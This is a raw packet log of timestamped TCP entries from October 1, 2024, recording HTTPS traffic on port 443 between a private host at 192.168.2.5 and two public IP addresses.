Oct 1, 2024 15:52:12.232549906 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.232589960 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.232616901 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.232629061 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.232635975 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.232713938 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.232719898 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.237921953 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.237948895 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.237963915 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.237970114 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.238039017 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.238070011 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.238138914 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.238178015 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.238183975 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.247833967 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.247867107 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.247879982 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.247889996 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.247972012 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.247977972 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248089075 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248121977 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248128891 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.248133898 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248164892 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.248171091 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248204947 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248239040 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.248245955 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248311996 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.248351097 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.248356104 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.249684095 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.249711990 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.249723911 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.249730110 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.249774933 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.249792099 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.249799013 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.249833107 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.249840021 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.253772974 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.253813982 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.253815889 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.253824949 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.253858089 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.253864050 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.253926992 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.253990889 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.253997087 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.258291960 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.258333921 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.258338928 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.258380890 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.258416891 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.258420944 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.258426905 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.258498907 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.258505106 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.262646914 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.262681007 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.262686014 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.262695074 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.262747049 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.262765884 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.262770891 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.262804031 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.262976885 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.263035059 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.263073921 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.263113976 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:46.645111084 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:46.645157099 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:46.645231962 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:46.656441927 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:46.656455994 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.288414955 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.288486004 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.289164066 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.289213896 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.457989931 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.458013058 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.458331108 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.458383083 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.463479042 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.511406898 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.776072979 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.776957035 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.776978016 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.777024984 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.777458906 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.777498960 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:47.777501106 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.777543068 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.823386908 CEST	49715	443	192.168.2.5	216.58.206.78
Oct 1, 2024 15:52:47.823410034 CEST	443	49715	216.58.206.78	192.168.2.5
Oct 1, 2024 15:52:48.039390087 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.039433002 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:48.039500952 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.039762974 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.039776087 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:48.928071022 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:48.928158045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.933494091 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.933530092 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:48.933794022 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:48.936949015 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.937315941 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:48.979435921 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.542262077 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.542340994 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.548607111 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.548693895 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.561880112 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.561975956 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.561980963 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.562036037 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.562083006 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.562083006 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.567399979 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.567455053 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.644737959 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.644804001 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.644886971 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.644942999 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.645054102 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.645085096 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.645104885 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.645138979 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.645204067 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.645621061 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.645705938 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.645719051 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.645785093 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.646801949 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.646883965 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.646898031 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.646962881 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.650058985 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.650125027 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.650168896 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.650269985 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.656414986 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.656481981 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.656511068 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.656572104 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.662636995 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.662728071 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.662815094 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.662921906 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.669111013 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.669210911 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.669240952 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.669281960 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.675504923 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.675565958 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.675596952 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.675762892 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.681632996 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.681699038 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.681729078 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.681781054 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.730891943 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.731053114 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.731115103 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.731172085 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.733995914 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.736963034 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.736979008 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.737041950 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.740330935 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.740437984 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.740452051 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.740515947 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.746768951 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.746831894 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.746845961 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.746907949 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.752896070 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.752958059 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.753062010 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.753298044 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.759258032 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.759324074 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.759377956 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.759463072 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.765588999 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.765638113 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.765671015 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.765707970 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.765724897 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.765763044 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.771838903 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.771889925 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.771939993 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.772102118 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.778089046 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.778134108 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.778202057 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.778245926 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.784589052 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.784655094 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.784701109 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.784765005 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.790910006 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.790983915 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.790998936 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.791060925 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.797365904 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.797452927 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.797467947 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.797540903 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.803390026 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.803585052 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.803600073 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.803687096 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.817673922 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.817912102 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.817926884 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.818020105 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.819205046 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.819304943 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.819318056 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.819432974 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.823035002 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.823451042 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.823466063 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.823539972 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.826724052 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.826780081 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.826797962 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.826839924 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.830493927 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.830547094 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.830564976 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.830611944 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.834255934 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.834333897 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.834335089 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.834357023 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.834403038 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.834470987 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.839597940 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.839663982 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.839678049 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.839739084 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.845319033 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.845407009 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.845419884 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.845487118 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.845808029 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.845877886 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.845889091 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.845947981 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.849246025 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.849329948 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.849343061 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.849539042 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.852895975 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.853075981 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.853089094 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.853163004 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.856755018 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.856837988 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.856942892 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.857283115 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.860471964 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.860563040 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.860577106 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.860707045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.864259958 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.864321947 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.864567041 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.864626884 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.867899895 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.867976904 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.868128061 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.868172884 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.871684074 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.871747971 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.871762037 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.871937037 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.876636982 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.876688957 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.876702070 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.876754045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.879153967 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.879209995 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.879223108 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.879281044 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.882755041 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.882811069 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.882831097 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.882869005 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.886621952 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.886703968 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.886718035 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.886781931 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.890285969 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.890377998 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.890391111 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.890506983 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.893873930 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.893954992 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.893973112 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.894035101 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.897427082 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.897505045 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.897519112 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.897643089 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913301945 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913367033 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913393974 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913460016 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913492918 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913507938 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913537025 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913578033 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913810968 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913861036 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913888931 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913901091 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913909912 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913919926 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.913949013 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.913968086 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.915672064 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.915785074 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.915796995 CEST	443	49716	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:51.915844917 CEST	49716	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:51.916004896 CEST	443	49716	142.250.184.193	192.168.2.5
